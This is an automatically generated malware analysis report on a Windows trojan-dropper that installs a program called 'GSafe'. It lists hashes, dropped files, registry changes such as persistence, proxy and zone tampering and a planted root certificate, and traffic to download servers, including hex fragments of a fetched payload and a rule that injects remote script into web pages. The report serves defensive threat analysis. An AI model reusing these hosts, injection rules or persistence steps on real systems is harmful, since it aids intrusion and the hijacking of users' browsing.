Trojan-Dropper.Win32.Vtimrun_943162bf6c

by malwarelabrobot on September 13th, 2015 in Malware Descriptions.

Susp_Dropper (Kaspersky), Installer.Win32.InnoSetup.FD, Installer.Win32.InnoSetup.2.FD, Trojan-Banker.Win32.Brasil.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Iconomon.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, TrojanDropperVtimrun.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Banker, Trojan, Installer, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 943162bf6c2b8919395aaa8383d5c0dc
SHA1: 20b6b5976a3e6419bc2d85fcf589e669931fd32e
SHA256: 7b547a41ba5651dfbfdd81b460a3b2f03a6009499bf3961eb984c52760fc00c9
SSDeep: 12288:RLo3LfbJE0tgu85tkL7Jcx H 9TcO3EEoc3TBFtIp4L0R0SUvWMalYolivAn:Uzttgua6L1hHocAXJ3TBWUvUYo4vA
Size: 776704 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-07-14 02:42:43
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.

Payload

No specific payload has been found.

Process activity

The Trojan-Dropper creates the following process(es):

net.exe:352
net1.exe:1880
nfregdrv.exe:828
setup.exe:1552
41Ge4d.tmp:960
Autoplay.exe:928
%original file name%.exe:468
GSafe.exe:1304
8A9F8h.tmp:500

The Trojan-Dropper injects its code into the following process(es):

setup.tmp:1744
GSafe.exe:516

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process setup.exe:1552 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-IQ4JV.tmp\setup.tmp (7386 bytes)

The process 41Ge4d.tmp:960 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\8DNHB5S8.tmp (170 bytes)

The process Autoplay.exe:928 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\8A9F8h.tmp (20506 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\41Ge4d.tmp (1831 bytes)

The process setup.tmp:1744 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-PVF17.tmp\_isetup\_shfoldr.dll (23 bytes)

The process %original file name%.exe:468 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\Autoplay.exe (6720 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\setup.exe (11547 bytes)

The process GSafe.exe:516 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

%WinDir%\Temp\GS_RuleList.txt (154 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\gw10_rules[1].htm (154 bytes)
%WinDir%\Temp\GSafe\SSL\GSafe Intermediate Certificate 2.cer (804 bytes)
%WinDir%\Temp\GSafe\SSL\cert.db (2 bytes)

The Trojan-Dropper deletes the following file(s):

%WinDir%\Temp\GS_RuleList.txt (0 bytes)

The process 8A9F8h.tmp:500 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plc4.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\smime3.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nspr4.dll (6360 bytes)
%System%\drivers\gfilterdrv.sys (56 bytes)
%Program Files%\GSafe\ProtocolFilters.dll (38495 bytes)
%Program Files%\GSafe\uninst.exe (313 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import.bat (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp (104507 bytes)
%Program Files%\GSafe\nfregdrv.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nss3.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\mozcrt19.dll (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\SelfDel.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plds4.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\SimpleSC.dll (1856 bytes)
%Program Files%\GSafe\ssleay32.dll (12536 bytes)
%Program Files%\GSafe\gfilterdrv.sys (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import_root_cert.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\ns4.tmp (6 bytes)
%Program Files%\GSafe\nfapi.dll (4992 bytes)
%Program Files%\GSafe\libeay32.dll (41192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\softokn3.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\gsafessl.cer (804 bytes)
%Program Files%\GSafe\GSafe.exe (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\certutil.exe (3312 bytes)

The Trojan-Dropper deletes the following file(s):

%Program Files%\GSafe\gfilterdrv.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\SelfDel.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\ns4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\SimpleSC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\System.dll (0 bytes)

Registry activity

The process net.exe:352 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "58 77 3D E7 B9 9F 87 C4 E0 4D 73 8D BC 2F EF 26"

The process net1.exe:1880 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 60 C1 96 2C 3A 66 9F B1 C0 E5 09 92 6C E2 51"

The process nfregdrv.exe:828 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "58 59 04 0C AB 2C C9 35 0F CA 3C 7B 88 94 50 3B"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "08 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

The process setup.exe:1552 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 5B EE B7 74 03 8B 00 12 7A 55 F8 50 C0 11 77"

The process 41Ge4d.tmp:960 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 C5 DA 57 6D E4 02 A1 E8 2C B0 F2 5D E0 2E D3"

The process Autoplay.exe:928 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CE 6E 9A 4E 1E 19 58 2C 1C 47 E6 DB 09 48 3F 71"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan-Dropper modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Dropper modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Dropper modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Dropper deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process setup.tmp:1744 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB B4 E5 6E 48 3A 40 7F 58 9E CB A2 DB CB 7B 42"

The process %original file name%.exe:468 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 02 E2 3F A0 A0 0F CF FE C7 5E 30 DC 0E 45 88"

To automatically run itself each time Windows is booted, the Trojan-Dropper adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"

The process GSafe.exe:1304 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C6 6F E3 3E 8F 0B 10 3F 48 C9 94 99 4D C1 13 D8"

The process GSafe.exe:516 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\GSafe]
"instid" = "9lp3TiOc58AE7s4AC1bqJACEUAdh9OZw"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\System\CurrentControlSet\Services\gfilterdrv]
"Tag" = "10"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\2B145125243BAAF8B577C789D038BAF5A072C2F5]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 2B 14 51 25"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "09 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E 28 DF 7A 4D E9 8F F3 C2 4E 46 37 59 F4 15 78"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan-Dropper modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Dropper modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Dropper modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan-Dropper deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates]
"2B145125243BAAF8B577C789D038BAF5A072C2F5"

The process 8A9F8h.tmp:500 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 91 E4 BA A8 C9 EB 0C 78 6C 5A A5 B4 23 D7 74"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\GSafe]
"affid" = "gw10"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GSafe]
"Comments" = "Browse safe, securely and do your best searches online (BuildID: OlBzPQEfIyB9430Bn248FKivzm)"
"UninstallString" = "%Program Files%\GSafe\uninst.exe /S"
"DisplayVersion" = "2.0.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GSafe]
"DisplayName" = "GSafe"
"QuietUninstallString" = "%Program Files%\GSafe\uninst.exe /S"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GSafe]
"Publisher" = "GENCO LABS"

[HKLM\SOFTWARE\GSafe]
"Version" = "2.0.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

MD5 File path
bc17f7429716519897867b2de71499e5 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\41Ge4d.tmp
2b01a84e964d90b0f408c131fa9c8a08 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\8DNHB5S8.tmp
1c76d7defa116a328f47036b54126e6c c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\GSafe\SSL\import_root_cert.exe
a253cbbfbceee37dd90b999d26542038 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\GSafe\SSL\nss\certutil.exe
0847bc96e23565dbae072ca335a212c9 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\GSafe\SSL\nss\mozcrt19.dll
32b2685234074047263d4a0cc8bf5d56 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\GSafe\SSL\nss\nspr4.dll
09cacf1074663b90a88c2345f42425ff c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\GSafe\SSL\nss\nss3.dll
1cce55587f95d57759e36f387c4f9dee c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\GSafe\SSL\nss\plc4.dll
9b31fe86fac03999982dccbe2a0103ac c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\GSafe\SSL\nss\plds4.dll
031a02aadf62df41f8558a18e5d280a9 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\GSafe\SSL\nss\smime3.dll
b2ad88dd7b83b62695b764d1dadfc15d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\GSafe\SSL\nss\softokn3.dll
c453e67433a29f125589120c66ae7df3 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\IXP000.TMP\Autoplay.exe
e15aa0de676936ac7a9a4e1f0107097d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\IXP000.TMP\setup.exe
ab8865701fe6c286c63a6ca5f13b46d7 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is-IQ4JV.tmp\setup.tmp
92dc6ef532fbb4a5c3201469a5b5eb63 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is-PVF17.tmp\_isetup\_shfoldr.dll
27a174c67226e0999167785fd24d5afd c:\Program Files\GSafe\GSafe.exe
77750c12323ee1185a4ab3497a37079e c:\Program Files\GSafe\ProtocolFilters.dll
64aab859fc61768e2d3a21043b250a1b c:\Program Files\GSafe\libeay32.dll
452aec2b91f7b9246be4dd27ead67e54 c:\Program Files\GSafe\nfapi.dll
01b5780505301ada6dc102fb77b2298c c:\Program Files\GSafe\nfregdrv.exe
73c940e515d0de29286aec1435297cca c:\Program Files\GSafe\ssleay32.dll
d53a914ec858ed47a6aa819a51c29b81 c:\Program Files\GSafe\uninst.exe
ada6fbb74c8af93c0fb55ba7c46ad6fb c:\WINDOWS\system32\drivers\gfilterdrv.sys

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 43748 44032 4.53606 3aeb6fb8fe8ab95f2462e3afb8b8acd3
.data 49152 8796 1536 4.57321 f3764284f4d25ed35f75b9c16e1ab608
.rsrc 61440 726400 726528 5.51988 9a0a04ed164e03ceae10a3283b643cb4
.reloc 790528 3480 3584 3.33168 bc74eb2a181cf1029262828db6ac5b5d

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://4jadabl.rlkwg.net/img/seperator?id=12002&action=2&run=1 46.4.76.250
hxxp://4jadabl.rlkwg.net/img/seperator?id=12002&action=2&run=2 46.4.76.250
hxxp://4jadabl.rlkwg.net/img/seperator?id=12002&action=2&run=3 46.4.76.250
hxxp://www.gencolabsllc.com/services/gw10_rules.php
hxxp://4jADAbl.rlkwg.net/img/seperator?id=12002&action=2&run=1
hxxp://4jADAbl.rlkwg.net/img/seperator?id=12002&action=2&run=2
hxxp://4jADAbl.rlkwg.net/img/seperator?id=12002&action=2&run=3


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /img/seperator?id=12002&action=2&run=1 HTTP/1.1
Host: 4jADAbl.rlkwg.net
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 12 Sep 2015 01:33:21 GMT
Server: Apache/2.4.7 (Ubuntu)
Content-Location: seperator.php
Vary: negotiate
TCN: choice
X-Powered-By: PHP/5.5.9-1ubuntu4.11
Content-Length: 0
Content-Type: text/html
....



GET /img/seperator?id=12002&action=2&run=2 HTTP/1.1

Host: 4jADAbl.rlkwg.net
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 12 Sep 2015 01:33:21 GMT
Server: Apache/2.4.7 (Ubuntu)
Content-Location: seperator.php
Vary: negotiate
TCN: choice
X-Powered-By: PHP/5.5.9-1ubuntu4.11
Content-Description: File Transfer
Content-Disposition: attachment; filename="spartan.exe"
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Length: 5930696
Content-Type: application/octet-stream
1d1bd66a7075644656775350beb96a73cd64465277535041066a737564465277535041
466a737564465277535041466a737564465277535041466a73a5644652794cea4f46de
7ab845fe533b9e71152e03005514343d1021312c6609121b0a292657313561341f1d55
0d2872331c03612b0517104a4b5f7d775041466a7375647afa8bab2888d4c10bbcf6ed
2abec1fbfa80a7d80fadd4f90f9ac3eaa5a3e1dedf809ddc3a99d3ed4699d7cf329be5
f8ef8ed2c10abcf6ed001e3038398ff8d87564465277535041466a7375644652770315
414626727064fdb16d185041466a73756446b2775c514a476c737538465277ef694146
6e73755b745277534041466a037564465237535051466a737764465677535047466a73
7164465277535041466a48756442527753504146687375e4465267535051466a737574
465267535041466a736564465277535041466a7375c0355277e75041466a834f648e59
77535041466a737564465277535041466a737564465277535041466a73756446527753
5041466a737564465277535041466a737564465277535041466a737564465277535041
466a737564365277df5241466a737564465277535041466a737564465277535041466a
735b10232a03535041e031737564565277530c41466a777564465277535041466a7375
6446727753306f340e1201054652e7425041461a737564545277533041466a73756446
5277535041466a337564067c13322420466a73adf37f5277c35041466e737564345277
535041466a73756446527753104146aa5d1b00272616535041866a7375547c52775350
41466a737564465277535041466a737564c65277937e333518107564469a7c535041b6
50737568465277255041466a737564465277535041462a737524465277535041466a73
7564465277535041466a737564465277535041466a737564465277535041466a737564
465277535041466a737564465277535041466a737564465277535041466a7375644652
77535041466a737564465277535041466a737564465277535041466a7375644652

<<< skipped >>>

GET /img/seperator?id=12002&action=2&run=3 HTTP/1.1

Host: 4jADAbl.rlkwg.net
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 12 Sep 2015 01:33:27 GMT
Server: Apache/2.4.7 (Ubuntu)
Content-Location: seperator.php
Vary: negotiate
TCN: choice
X-Powered-By: PHP/5.5.9-1ubuntu4.11
Content-Description: File Transfer
Content-Disposition: attachment; filename="spartan.exe"
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Length: 1100800
Content-Type: application/octet-stream
1d1bd66a7075644656775350beb96a73cd64465277535041066a737564465277535041
466a737564465277535041466a737564465277535041466a73f5644652794cea4f46de
7ab845fe533b9e71152e03005514343d1021312c6609121b0a292657313561341f1d55
0d2872331c03612b0517104a4b5f7d775041466a737564161777531c40406a73756446
5277535041466a73956448517c525201163f7175389c5777377941464a167764464277
535031446a737524465267535041446a737164465276535041426a7375644652775390
49466a777564465277535241466a737564475267535041467a73757446527753504156
6a737564465277535041466ae37d64225277535041466a737564465277535041466a73
756446527753504146ca7b7568595277535041466a737564465277535041466a737564
465277535041466a737564465277535041466a7375644652775350414642e17d648253
77535041466a737564465277535041466a737564465277535041681e160d1046527703
0543466a637564460475535045466a737564465277535041466a735564463259373135
276a7375389c5777532043466aaf7064460875535041466a737564465277535001466a
b35b063521775350412243737564165a77535041466a737564465277535041466a7375
6446d27753906f053827756446527353504146ea7b7564445277536649466a73756446
5277535041466a737564447c1e373135276a730968465277c3584146647375647e5a77
535041466a73756446527753104146aa5d07012a3d1453504d596a7375c44e52777350
41462c7b7564465277535041466a737564465277515041466a73756446527753504146
6a737564465277535041466a737564465277535041466a737564465277535041466a73
7564465277535041466a737564465277535041466a737564465277535041466a737564
465277535041466a737564465277535041466a737564465277535041466a7375644652
77535041466a737564465277535041466a737564465277535041466a7375644652

<<< skipped >>>

GET /services/gw10_rules.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.gencolabsllc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Sat, 12 Sep 2015 01:33:41 GMT
Content-Type: text/html
Connection: close
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
</head>|<script src="hXXps://gsafejs.me/services/gw/gw10.js"&
gt;</script></head>.{gsafe_null}|<script src="hXXps://g
safejs.me/services/gw/gw10.js"></script>...


The Trojan-Dropper connects to the servers at the folowing location(s):

%original file name%.exe_468:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
KERNEL32.dll
GDI32.dll
USER32.dll
msvcrt.dll
COMCTL32.dll
VERSION.dll
advapi32.dll
wininit.ini
advpack.dll
Software\Microsoft\Windows\CurrentVersion\App Paths
setupapi.dll
setupx.dll
IXPd.TMP
TMP4351$.TMP
FINISHMSG
USRQCMD
ADMQCMD
msdownld.tmp
wextract.pdb
PSSSSSSh
RegCloseKey
RegOpenKeyExA
RegQueryInfoKeyA
RegCreateKeyExA
GetWindowsDirectoryA
ExitWindowsEx
MsgWaitForMultipleObjects
_acmdln
_amsg_exit
rundll32.exe %s,InstallHinfSection %s 128 %s
SHELL32.DLL
Software\Microsoft\Windows\CurrentVersion\RunOnce
PendingFileRenameOperations
System\CurrentControlSet\Control\Session Manager\FileRenameOperations
wextract_cleanup%d
%s /D:%s
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"
Command.com /c %s
zcÁ
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\
Autoplay.exe
setup.exe
:4.Cf
oS.LK
.ixMsh
L[.Yi
E@:%F
," .RqN
$H%B.Gl=MY4O0.
,/G%.C
KeYdz
.Xg  0
u.WFA
[o%S2
/1/-\/_\]-
i.aQ"
.ZR[uy
.bt%v?
)X.MgX
_P.Su
m>0%s
>%CHP"\
.WlruVj
,c%Un
.BJVTNv
d/.ha
I.QrIx
.NAX)
A.kJ/|
M&O
.Id3?
%x_l&
*|.Ov;
Uz.Rk
X.IE`_
&:W%S
rQ{ÝxL
.Cp{\S
|.FBT)
{SShm
:y.Ux&
];%CY}]
9$.ddp
.pvty
R.soO
wextract.manifest
Manifest to support IExpress WExtract.exe.
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel
Kernel32.dll
